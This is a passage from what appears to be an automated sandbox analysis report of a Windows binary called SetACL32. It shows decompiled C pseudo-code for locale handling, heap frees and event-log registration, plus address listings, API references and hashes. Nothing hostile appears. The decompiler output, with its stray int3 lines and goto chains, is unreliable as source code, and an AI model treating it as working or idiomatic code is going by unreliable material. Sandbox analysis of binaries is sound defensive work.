														_t366 = _t366 + 0xc;
														__eflags = _t366 - 0x12f01cc;
													} while (_t366 <= 0x12f01cc);
													_t363 = _v468 + 2;
													_t269 = E012D8338(_t380, _t363, ";");
													_t429 = _v464;
													_t448 = _t269;
													_pop(_t384);
													__eflags = _t448;
													if(_t448 != 0) {
														L49:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t385 = _v452;
															goto L55;
														} else {
															_push(_t448);
															_t272 = E012D832D( &_v276, 0x83, _t363);
															_t470 = _t468 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E012CF37C();
																asm("int3");
																_push(_t462);
																_t463 = _t470;
																_t275 =  *0x1309018; // 0xedd8d3b4
																_v560 = _t275 ^ _t463;
																_push(_t363);
																_t368 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t368;
																_v1276 = E012D7220(_t384, _t424) + 0x278;
																_t282 = E012CFA56(_t368, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t472 = _t470 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 == 0) {
																	L124:
																	_t283 = 0;
																	__eflags = 0;
																	goto L125;
																} else {
																	_t103 = _t368 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t285 =  &_v280;
																	_v724 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t388 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t285 -  *_t388;
																		_t454 = _v724;
																		if( *_t285 !=  *_t388) {
																			break;
																		}
																		__eflags =  *_t285;
																		if( *_t285 == 0) {
																			L91:
																			_t286 = _v712;
																		} else {
																			_t460 =  *((intOrPtr*)(_t285 + 2));
																			__eflags = _t460 -  *((intOrPtr*)(_t388 + 2));
																			_v714 = _t460;
																			_t454 = _v724;
																			if(_t460 !=  *((intOrPtr*)(_t388 + 2))) {
																				break;
																			} else {
																				_t285 = _t285 + 4;
																				_t388 = _t388 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t286;
																		if(_t286 != 0) {
																			_t389 =  &_v280;
																			_t424 = _t389 + 2;
																			do {
																				_t287 =  *_t389;
																				_t389 = _t389 + 2;
																				__eflags = _t287 - _v712;
																			} while (_t287 != _v712);
																			_v728 = (_t389 - _t424 >> 1) + 1;
																			_t290 = E012D8049(4 + ((_t389 - _t424 >> 1) + 1) * 2);
																			_v740 = _t290;
																			__eflags = _t290;
																			if(_t290 == 0) {
																				goto L124;
																			} else {
																				_v736 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t368 * 4);
																				_v752 =  *(_t433 + 8);
																				_t396 =  &_v280;
																				_v716 = _t290 + 4;
																				_t292 = E012D810C(_t290 + 4, _v728, _t396);
																				_t473 = _t472 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E012CF37C();
																					asm("int3");
																					_push(_t463);
																					_push(_t396);
																					_v1336 = _v1336 & 0x00000000;
																					_t296 = E012DA806(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t296;
																					if(_t296 == 0) {
																						L134:
																						return 0xfde9;
																					}
																					_t298 = _v20;
																					__eflags = _t298;
																					if(_t298 == 0) {
																						goto L134;
																					}
																					return _t298;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v716;
																					if(_v280 != 0x43) {
																						L102:
																						_push( &_v708); // executed
																						_t301 = E012CF751(_t368, _t433); // executed
																						_t398 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t398 = _v712;
																							_t301 = _t398;
																						}
																					}
																					 *(_t433 + 0xa0 + _t368 * 4) = _t301;
																					__eflags = _t368 - 2;
																					if(_t368 != 2) {
																						__eflags = _t368 - 1;
																						if(_t368 != 1) {
																							__eflags = _t368 - 5;
																							if(_t368 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v720;
																						}
																					} else {
																						_t458 = _v732;
																						_t424 = _t398;
																						_t408 = _t458;
																						 *(_t433 + 8) = _v720;
																						_v716 = _t458;
																						_v728 = _t458[8];
																						_v720 = _t458[9];
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *_t408;
																							if( *(_t433 + 8) ==  *_t408) {
																								break;
																							}
																							_t459 = _v716;
																							_t424 = _t424 + 1;
																							_t332 =  *_t408;
																							 *_t459 = _v728;
																							_v720 = _t408[1];
																							_t408 = _t459 + 8;
																							 *((intOrPtr*)(_t459 + 4)) = _v720;
																							_t368 = _v744;
																							_t458 = _v732;
																							_v728 = _t332;
																							_v716 = _t408;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t323 = E012D83DF(_t424, __eflags, _v712, 1, 0x12f0110, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t473 = _t473 + 0x1c;
																								__eflags = _t323;
																								if(_t323 == 0) {
																									_t409 = _v712;
																								} else {
																									_t325 = _v712;
																									do {
																										 *(_t463 + _t325 * 2 - 0x20c) =  *(_t463 + _t325 * 2 - 0x20c) & 0x000001ff;
																										_t325 = _t325 + 1;
																										__eflags = _t325 - 0x7f;
																									} while (_t325 < 0x7f);
																									_t327 = E012CCF50( &_v536,  *0x1309070, 0xfe);
																									_t473 = _t473 + 0xc;
																									__eflags = _t327;
																									_t409 = 0 | _t327 == 0x00000000;
																								}
																								_t458[1] = _t409;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L122;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v728;
																							 *(_t458 + 4 + _t424 * 8) = _v720;
																						}
																						goto L110;
																					}
																					L122:
																					_t302 = _t368 * 0xc;
																					_t199 = _t302 + 0x12f0198; // 0x1297da0
																					 *0x12ee308(_t433);
																					_t304 =  *((intOrPtr*)( *_t199))();
																					_t401 = _v736;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						__eflags = _t401 - 0x1309268;
																						if(_t401 == 0x1309268) {
																							L129:
																							_t305 = _v724;
																						} else {
																							_t457 = _t368 + _t368;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L129;
																							} else {
																								E012D800F( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E012D800F( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E012D800F( *(_t433 + 0xa0 + _t368 * 4));
																								_t305 = _v724;
																								_t404 = _v712;
																								 *(_t305 + _t433) = _t404;
																								 *(_t433 + 0xa0 + _t368 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						_t283 =  *(_t305 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t368 + _t368) * 8)) = _t402;
																					} else {
																						 *((intOrPtr*)(_v724 + _t433)) = _t401;
																						E012D800F( *(_t433 + 0xa0 + _t368 * 4));
																						 *(_t433 + 0xa0 + _t368 * 4) = _v748;
																						E012D800F(_v740);
																						 *(_t433 + 8) = _v752;
																						goto L124;
																					}
																					goto L125;
																				}
																			}
																		} else {
																			_t283 = _t424;
																			L125:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t463;
																			_pop(_t369);
																			return E012CAE19(_t283, _t369, _v16 ^ _t463, _t424, _t434, _t450);
																		}
																		goto L136;
																	}
																	asm("sbb eax, eax");
																	_t286 = _t285 | 0x00000001;
																	__eflags = _t286;
																	goto L93;
																}
															} else {
																_t333 = _t448 + _t448;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E012CB837();
																	goto L83;
																} else {
																	 *((short*)(_t462 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v456);
																	_push(_t429);
																	L84();
																	_t385 = _v452;
																	_t468 = _t470 + 0xc;
																	__eflags = _t335;
																	if(_t335 != 0) {
																		_t385 = _t385 + 1;
																		_v452 = _t385;
																	}
																	L55:
																	_t445 = _t363 + _t448 * 2;
																	_t270 =  *_t445 & 0x0000ffff;
																	_t424 = _t270;
																	__eflags = _t270;
																	if(_t270 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t385;
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																			break;
																		}
																		goto L81;
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t363 - _t336;
														if( *_t363 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L136;
										}
										_t254 = 0;
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t254 =  *(_t429 + (_t254 + 2 + _t254 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t254);
							_push(_t429);
							L84();
						}
						L81:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t462;
						_pop(_t364);
						return E012CAE19(_t254, _t364, _v12 ^ _t462, _t424, _t430, _t446);
					}
				}
				L136:
			}




















































































































































              0x012cfee0
              0x012cfee8
              0x012cfee9
              0x012cfef2
              0x012cfef5
              0x012cfefa
              0x012cfefc
              0x012cfefe
              0x012cff01
              0x012d001e
              0x012d0021
              0x012cff07
              0x012cff07
              0x012cff08
              0x012cff08
              0x012cff0b
              0x012cff0e
              0x012cff10
              0x012cff13
              0x012cff16
              0x012cff18
              0x012cff1b
              0x012cff20
              0x012cff2e
              0x012cff38
              0x012cff3b
              0x012cff3e
              0x012cff3e
              0x012cff49
              0x012cff4e
              0x012cff53
              0x00000000
              0x012cff59
              0x012cff5c
              0x012cff5c
              0x012cff5f
              0x012cff61
              0x012cff64
              0x012cff66
              0x012cff66
              0x012cff66
              0x012cff69
              0x012cff69
              0x012cff69
              0x012cff6f
              0x00000000
              0x00000000
              0x012cff74
              0x012cff8b
              0x012cff8b
              0x012cff76
              0x012cff76
              0x012cff7e
              0x00000000
              0x012cff80
              0x012cff80
              0x012cff83
              0x012cff89
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012cff89
              0x012cff7e
              0x012cff94
              0x012cff94
              0x012cff99
              0x012cff9e
              0x012cffa2
              0x012cffae
              0x012cffb1
              0x012cffb4
              0x012cffbe
              0x012cffc6
              0x012cffce
              0x00000000
              0x012cffd4
              0x012cffd8
              0x012d0023
              0x012d002c
              0x012d002f
              0x012d0031
              0x012d0035
              0x012d0039
              0x012d003e
              0x012d0043
              0x012d0039
              0x012d0047
              0x012d0049
              0x012d004b
              0x012d004f
              0x012d0050
              0x012d0055
              0x012d005a
              0x012d0050
              0x012d005d
              0x012d0060
              0x012d0063
              0x012d0066
              0x012d0069
              0x012cffda
              0x012cffdd
              0x012cffe0
              0x012cffe2
              0x012cffe6
              0x012cffea
              0x012cffef
              0x012cfff4
              0x012cffea
              0x012cfffa
              0x012cfffc
              0x012d0001
              0x012d0006
              0x012d000b
              0x012d0001
              0x012d000c
              0x012d0010
              0x012d0010
              0x012d0013
              0x012d0017
              0x012d001a
              0x012d001a
              0x00000000
              0x012d001d
              0x00000000
              0x012cffce
              0x012cff8f
              0x012cff91
              0x012cff91
              0x00000000
              0x012cff91
              0x012d0070
              0x012d0071
              0x012d0072
              0x012d0073
              0x012d0074
              0x012d0075
              0x012d007a
              0x012d007e
              0x012d0080
              0x012d0086
              0x012d008d
              0x012d0090
              0x012d0093
              0x012d0094
              0x012d0095
              0x012d0098
              0x012d0099
              0x012d009c
              0x012d00a2
              0x012d00a4
              0x012d00c9
              0x012d00d3
              0x012d00d9
              0x012d00db
              0x012d00e1
              0x012d00e3
              0x012d0343
              0x012d0344
              0x00000000
              0x012d00e9
              0x012d00e9
              0x012d00ed
              0x012d025b
              0x012d0278
              0x012d027d
              0x012d0280
              0x012d0282
              0x012d0288
              0x012d0288
              0x012d028a
              0x012d028d
              0x012d028f
              0x012d0295
              0x012d0295
              0x012d0297
              0x012d031e
              0x012d031e
              0x012d029d
              0x012d029d
              0x012d029f
              0x012d02a5
              0x012d02a8
              0x012d02ab
              0x012d02b1
              0x00000000
              0x00000000
              0x012d02b3
              0x012d02b7
              0x012d02e0
              0x012d02e0
              0x012d02e2
              0x012d02b9
              0x012d02b9
              0x012d02bd
              0x012d02c1
              0x012d02c8
              0x012d02ce
              0x00000000
              0x012d02d0
              0x012d02d0
              0x012d02d3
              0x012d02d6
              0x012d02de
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d02de
              0x012d02ce
              0x012d02ed
              0x012d02ed
              0x012d02ef
              0x012d031d
              0x012d031d
              0x00000000
              0x012d02f1
              0x012d02f1
              0x012d02f7
              0x012d02f8
              0x012d02f9
              0x012d02fa
              0x012d02ff
              0x012d0305
              0x012d0308
              0x012d030a
              0x012d0311
              0x012d0313
              0x012d0315
              0x012d030c
              0x012d030c
              0x012d030d
              0x00000000
              0x012d030d
              0x012d030a
              0x00000000
              0x012d02ef
              0x012d02e6
              0x012d02e8
              0x012d02eb
              0x012d02eb
              0x00000000
              0x012d02eb
              0x012d0324
              0x012d0324
              0x012d0325
              0x012d0328
              0x012d032e
              0x012d032e
              0x012d0337
              0x012d0339
              0x00000000
              0x012d033b
              0x012d033b
              0x012d033d
              0x00000000
              0x012d033f
              0x012d033f
              0x012d033f
              0x012d033d
              0x012d0339
              0x00000000
              0x012d00f3
              0x012d00f3
              0x012d00f8
              0x00000000
              0x012d00fe
              0x012d00fe
              0x012d0103
              0x00000000
              0x012d0109
              0x012d0109
              0x012d010f
              0x012d0114
              0x012d0116
              0x012d011d
              0x012d011e
              0x012d0120
              0x00000000
              0x00000000
              0x012d0126
              0x012d0126
              0x012d012a
              0x012d0130
              0x00000000
              0x012d0136
              0x012d0138
              0x012d0139
              0x012d013c
              0x00000000
              0x012d0142
              0x012d0142
              0x012d0148
              0x012d014d
              0x012d0157
              0x012d015b
              0x012d0160
              0x012d0163
              0x012d0165
              0x00000000
              0x012d0167
              0x012d0167
              0x012d0169
              0x012d016c
              0x012d016c
              0x012d016f
              0x012d0172
              0x012d0172
              0x012d017d
              0x012d017f
              0x012d0181
              0x00000000
              0x00000000
              0x012d0181
              0x00000000
              0x012d0183
              0x012d0183
              0x012d0189
              0x012d018c
              0x012d018c
              0x012d019a
              0x012d01a3
              0x012d01a8
              0x012d01ae
              0x012d01b1
              0x012d01b2
              0x012d01b4
              0x012d01c2
              0x012d01c2
              0x012d01c9
              0x012d022a
              0x00000000
              0x012d01cb
              0x012d01cb
              0x012d01d9
              0x012d01de
              0x012d01e1
              0x012d01e3
              0x012d035e
              0x012d0360
              0x012d0361
              0x012d0362
              0x012d0363
              0x012d0364
              0x012d0365
              0x012d036a
              0x012d036d
              0x012d036e
              0x012d0376
              0x012d037d
              0x012d0380
              0x012d0381
              0x012d0384
              0x012d0388
              0x012d0389
              0x012d038c
              0x012d039c
              0x012d03bf
              0x012d03c4
              0x012d03c7
              0x012d03c9
              0x012d06a1
              0x012d06a1
              0x012d06a1
              0x00000000
              0x012d03cf
              0x012d03cf
              0x012d03d2
              0x012d03d2
              0x012d03d5
              0x012d03db
              0x012d03e1
              0x012d03e4
              0x012d03e6
              0x012d03e9
              0x012d03f0
              0x012d03f3
              0x012d03f9
              0x00000000
              0x00000000
              0x012d03fb
              0x012d03ff
              0x012d0428
              0x012d0428
              0x012d0401
              0x012d0401
              0x012d0405
              0x012d0409
              0x012d0410
              0x012d0416
              0x00000000
              0x012d0418
              0x012d0418
              0x012d041b
              0x012d041e
              0x012d0426
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d0426
              0x012d0416
              0x012d0435
              0x012d0435
              0x012d0437
              0x012d0440
              0x012d0446
              0x012d0449
              0x012d0449
              0x012d044c
              0x012d044f
              0x012d044f
              0x012d045f
              0x012d046d
              0x012d0472
              0x012d0479
              0x012d047b
              0x00000000
              0x012d0481
              0x012d0487
              0x012d0494
              0x012d049d
              0x012d04a3
              0x012d04b0
              0x012d04b7
              0x012d04bc
              0x012d04bf
              0x012d04c1
              0x012d0721
              0x012d0727
              0x012d0728
              0x012d0729
              0x012d072a
              0x012d072b
              0x012d072c
              0x012d0731
              0x012d0734
              0x012d0737
              0x012d0738
              0x012d074a
              0x012d074f
              0x012d0751
              0x012d075a
              0x00000000
              0x012d075a
              0x012d0753
              0x012d0756
              0x012d0758
              0x00000000
              0x00000000
              0x012d0760
              0x012d04c7
              0x012d04c7
              0x012d04d5
              0x012d04d8
              0x012d04ee
              0x012d04f4
              0x012d04f5
              0x012d04fb
              0x012d04da
              0x012d04da
              0x012d04e2
              0x00000000
              0x012d04e4
              0x012d04e4
              0x012d04ea
              0x012d04ea
              0x012d04e2
              0x012d0501
              0x012d0508
              0x012d050b
              0x012d062b
              0x012d062e
              0x012d063b
              0x012d063e
              0x012d0646
              0x012d0646
              0x012d0630
              0x012d0636
              0x012d0636
              0x012d0511
              0x012d0511
              0x012d0517
              0x012d051f
              0x012d0521
              0x012d0524
              0x012d052d
              0x012d0536
              0x012d053c
              0x012d053f
              0x012d0541
              0x00000000
              0x00000000
              0x012d0543
              0x012d0549
              0x012d054a
              0x012d0555
              0x012d055d
              0x012d0565
              0x012d0568
              0x012d056b
              0x012d0571
              0x012d0577
              0x012d057d
              0x012d0583
              0x012d0586
              0x00000000
              0x00000000
              0x012d0588
              0x012d05ad
              0x012d05ad
              0x012d05b0
              0x012d05cd
              0x012d05d2
              0x012d05d5
              0x012d05d7
              0x012d0615
              0x012d05d9
              0x012d05d9
              0x012d05df
              0x012d05e4
              0x012d05ec
              0x012d05ed
              0x012d05ed
              0x012d0604
              0x012d060b
              0x012d060e
              0x012d0610
              0x012d0610
              0x012d061b
              0x012d0621
              0x012d0621
              0x012d0626
              0x00000000
              0x012d0626
              0x012d058a
              0x012d058c
              0x012d0591
              0x012d0597
              0x012d05a0
              0x012d05a9
              0x012d05a9
              0x00000000
              0x012d058c
              0x012d0649
              0x012d0649
              0x012d064d
              0x012d0655
              0x012d065b
              0x012d065e
              0x012d0664
              0x012d0666
              0x012d06b2
              0x012d06b8
              0x012d0704
              0x012d0704
              0x012d06ba
              0x012d06bf
              0x012d06bf
              0x012d06c5
              0x012d06c9
              0x00000000
              0x012d06cb
              0x012d06cf
              0x012d06d8
              0x012d06e4
              0x012d06e9
              0x012d06f2
              0x012d06f8
              0x012d06fb
              0x012d06fb
              0x012d06c9
              0x012d070a
              0x012d0712
              0x012d0718
              0x012d071b
              0x012d0668
              0x012d066e
              0x012d0678
              0x012d068a
              0x012d0691
              0x012d069e
              0x00000000
              0x012d069e
              0x00000000
              0x012d0666
              0x012d04c1
              0x012d0439
              0x012d0439
              0x012d06a3
              0x012d06a6
              0x012d06a7
              0x012d06a8
              0x012d06aa
              0x012d06b1
              0x012d06b1
              0x00000000
              0x012d0437
              0x012d0430
              0x012d0432
              0x012d0432
              0x00000000
              0x012d0432
              0x012d01e9
              0x012d01e9
              0x012d01ec
              0x012d01f1
              0x012d0359
              0x00000000
              0x012d01f7
              0x012d01f9
              0x012d0201
              0x012d0207
              0x012d0208
              0x012d020e
              0x012d020f
              0x012d0214
              0x012d021a
              0x012d021d
              0x012d021f
              0x012d0221
              0x012d0222
              0x012d0222
              0x012d0230
              0x012d0230
              0x012d0233
              0x012d0236
              0x012d0238
              0x012d023b
              0x012d023d
              0x012d023d
              0x012d0240
              0x012d0240
              0x012d0243
              0x012d0246
              0x00000000
              0x012d024c
              0x012d024c
              0x012d024e
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d024e
              0x012d0246
              0x012d01f1
              0x012d01e3
              0x012d01b6
              0x012d01b8
              0x012d01b9
              0x012d01bc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012d01bc
              0x012d01b4
              0x012d013c
              0x00000000
              0x012d0130
              0x012d0254
              0x00000000
              0x012d0254
              0x012d0103
              0x012d00f8
              0x012d00ed
              0x012d00a6
              0x012d00a6
              0x012d00a8
              0x012d00bf
              0x012d00aa
              0x012d00aa
              0x012d00ab
              0x012d00ac
              0x012d00ad
              0x012d00b2
              0x012d034a
              0x012d034d
              0x012d034e
              0x012d034f
              0x012d0351
              0x012d0358
              0x012d0358
              0x012d00a4
              0x00000000

              APIs
                • Part of subcall function 012D8049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,012DDAF3,?,00000000,?,012E0312,?,00000004,?,?,?,?,012D6975), ref: 012D807B
              • _free.LIBCMT ref: 012CFFEF
              • _free.LIBCMT ref: 012D0006
              • _free.LIBCMT ref: 012D0023
              • _free.LIBCMT ref: 012D003E
              • _free.LIBCMT ref: 012D0055
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free$AllocateHeap
              • String ID:
              • API String ID: 3033488037-0
              • Opcode ID: b561dfec31d2b7a2ed9d2434c017abec0508f02dc8287d8f0a0a3fab93001d3a
              • Instruction ID: 88ac96ce435c6c8e157af0cfad5c209934cbde670b6904e87e2e5928c013da91
              • Opcode Fuzzy Hash: b561dfec31d2b7a2ed9d2434c017abec0508f02dc8287d8f0a0a3fab93001d3a
              • Instruction Fuzzy Hash: EB51F531A20306AFDB21DF29C841ABA77F5FF59711F14466DE609D72A1E731E901CB84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A9500 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 192registryCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 60%
              			E012A9500(void* __ebx, signed int __edx, void* __edi, signed int __esi, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				WCHAR* _v44;
				signed int _v48;
				void* _v68;
				struct _CRITICAL_SECTION* _v76;
				signed int _v80;
				WCHAR* _v92;
				char _v100;
				signed int _v104;
				struct _CRITICAL_SECTION* _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				void* __ebp;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				WCHAR* _t81;
				signed int _t87;
				signed int _t88;
				signed int _t90;
				signed int _t96;
				void* _t106;
				void* _t110;
				void* _t114;
				intOrPtr _t115;
				WCHAR** _t118;
				intOrPtr _t123;
				intOrPtr _t129;
				signed int _t141;
				signed int _t152;
				intOrPtr _t163;
				intOrPtr _t164;
				signed int _t165;
				signed int _t166;
				void* _t167;
				signed int _t169;
				void* _t170;
				signed int _t171;
				void* _t172;
				signed int _t173;
				signed int _t174;
				void* _t176;
				signed int _t177;
				void* _t181;
				void* _t182;
				intOrPtr _t183;

				_t194 = __fp0;
				_t169 = __esi;
				_t168 = __edi;
				_t165 = __edx;
				_t134 = __ebx;
				_push(0xffffffff);
				_push(0x12ea125);
				_push( *[fs:0x0]);
				_t177 = _t176 - 0x3c;
				_t74 =  *0x1309018; // 0xedd8d3b4
				_t75 = _t74 ^ _t173;
				_v20 = _t75;
				_push(__esi);
				_push(_t75);
				 *[fs:0x0] =  &_v16;
				_v76 = 0x130b6d4;
				EnterCriticalSection(0x130b6d4);
				_v8 = 0;
				_t77 = 7;
				_v44 = 0;
				 *0x1309ac1 = 0;
				_v28 = 0;
				_v24 = 7;
				_v44 = 0;
				_v8 = 1;
				_t183 =  *0x1309a94; // 0x0
				if(_t183 != 0) {
					L18:
					_t169 = 0;
					__eflags = 0;
					goto L19;
				} else {
					_push(0);
					L28();
					E012982B0(_t134,  &_v44, E012A2DD0(__ebx,  &_v68, _t165, __edi, __esi, _t183, __fp0));
					_t165 = _v48;
					if(_t165 < 8) {
						L5:
						if(_v28 != 0) {
							_t181 = _t177 - 0x18;
							E012983B0(_t181,  &_v44);
							_t106 = E012C5880(_t134,  &_v68, _t168, _t169, _t194);
							_t177 = _t181 + 0x18;
							E012982B0(_t134,  &_v44, _t106);
							_t166 = _v48;
							__eflags = _t166 - 8;
							if(_t166 < 8) {
								L11:
								_t182 = _t177 - 0x18;
								E012983B0(_t182,  &_v44);
								_t110 = E012C5770( &_v68, _t168, _t169, _t194);
								_t177 = _t182 + 0x18;
								_t161 =  &_v44;
								E012982B0(_t134,  &_v44, _t110);
								_t165 = _v48;
								__eflags = _t165 - 8;
								if(_t165 < 8) {
									goto L15;
								} else {
									_t161 = _v68;
									_t165 = 2 + _t165 * 2;
									_t118 = _t161;
									__eflags = _t165 - 0x1000;
									if(_t165 < 0x1000) {
										L14:
										_push(_t165);
										E012CAE27(_t161);
										_t177 = _t177 + 8;
										goto L15;
									} else {
										_t140 =  *(_t161 - 4);
										_t165 = _t165 + 0x23;
										__eflags = _t118 -  *(_t161 - 4) + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L26;
										} else {
											goto L14;
										}
									}
								}
							} else {
								_t163 = _v68;
								_t167 = 2 + _t166 * 2;
								_t123 = _t163;
								__eflags = _t167 - 0x1000;
								if(_t167 < 0x1000) {
									L10:
									_push(_t167);
									E012CAE27(_t163);
									_t177 = _t177 + 8;
									goto L11;
								} else {
									_t140 =  *(_t163 - 4);
									_t165 = _t167 + 0x23;
									__eflags = _t123 -  *(_t163 - 4) + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										goto L25;
									} else {
										goto L10;
									}
								}
							}
						} else {
							_t161 =  &_v44;
							E012A1EE0(_t134,  &_v44, _t165, _t168, _t169, L"DefaultEventSource", 0x12);
							L15:
							_t113 =  >=  ? _v44 :  &_v44;
							_t114 = RegisterEventSourceW(0,  >=  ? _v44 :  &_v44); // executed
							 *0x1309a90 = _t114; // executed
							_t115 = E012D429A(_t161, 0, 0,  &M012AA960, 0x1309a90, 0, 0); // executed
							_t177 = _t177 + 0x18;
							 *0x1309a94 = _t115;
							_t189 = _t115;
							if(_t115 != 0) {
								_t77 = _v24;
								 *0x1309ac0 = 1;
								goto L18;
							} else {
								_t169 = E012A8D80( *((intOrPtr*)(E012D3E40(_t189))));
								_t77 = _v24;
							}
							L19:
							if(_t77 < 8) {
								L23:
								_v28 = 0;
								_v24 = 7;
								_v44 = 0;
								LeaveCriticalSection(0x130b6d4);
								 *[fs:0x0] = _v16;
								_pop(_t170);
								return E012CAE19(_t169, _t134, _v20 ^ _t173, _t165, _t168, _t170);
							} else {
								_t140 = _v44;
								_t165 = 2 + _t77 * 2;
								_t81 = _t140;
								if(_t165 < 0x1000) {
									L22:
									_push(_t165);
									E012CAE27(_t140);
									goto L23;
								} else {
									_t140 =  *(_t140 - 4);
									_t165 = _t165 + 0x23;
									if(_t81 - _t140 + 0xfffffffc > 0x1f) {
										goto L27;
									} else {
										goto L22;
									}
								}
							}
						}
					} else {
						_t164 = _v68;
						_t165 = 2 + _t165 * 2;
						_t129 = _t164;
						if(_t165 < 0x1000) {
							L4:
							_push(_t165);
							E012CAE27(_t164);
							_t177 = _t177 + 8;
							goto L5;
						} else {
							_t140 =  *(_t164 - 4);
							_t165 = _t165 + 0x23;
							if(_t129 -  *(_t164 - 4) + 0xfffffffc > 0x1f) {
								E012CF35F(_t134, _t140, _t165, __eflags);
								L25:
								E012CF35F(_t134, _t140, _t165, __eflags);
								L26:
								E012CF35F(_t134, _t140, _t165, __eflags);
								L27:
								E012CF35F(_t134, _t140, _t165, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t173);
								_t174 = _t177;
								_push(0xffffffff);
								_push(0x12ea165);
								_push( *[fs:0x0]);
								_t87 =  *0x1309018; // 0xedd8d3b4
								_t88 = _t87 ^ _t174;
								_v104 = _t88;
								_push(_t169);
								_push(_t88);
								_t89 =  &_v100;
								 *[fs:0x0] =  &_v100;
								_t171 = _v80;
								_v132 = 0x130b6d4;
								EnterCriticalSection(0x130b6d4);
								_v92 = 0;
								__eflags = _t171;
								if(_t171 != 0) {
									_t141 = _t171;
									_t165 = _t141 + 2;
									do {
										_t90 =  *_t141;
										_t141 = _t141 + 2;
										__eflags = _t90;
									} while (_t90 != 0);
									__eflags = _t141 - _t165;
									_t89 = E012A1EE0(_t134, 0x1309aa4, _t165, _t168, _t171, _t171, _t141 - _t165 >> 1);
									goto L40;
								} else {
									__eflags =  *0x1309ab4 - _t171; // 0x0
									if(__eflags != 0) {
										L40:
										LeaveCriticalSection(0x130b6d4);
										 *[fs:0x0] = _v20;
										_pop(_t172);
										__eflags = _v24 ^ _t174;
										return E012CAE19(_t89, _t134, _v24 ^ _t174, _t165, _t168, _t172);
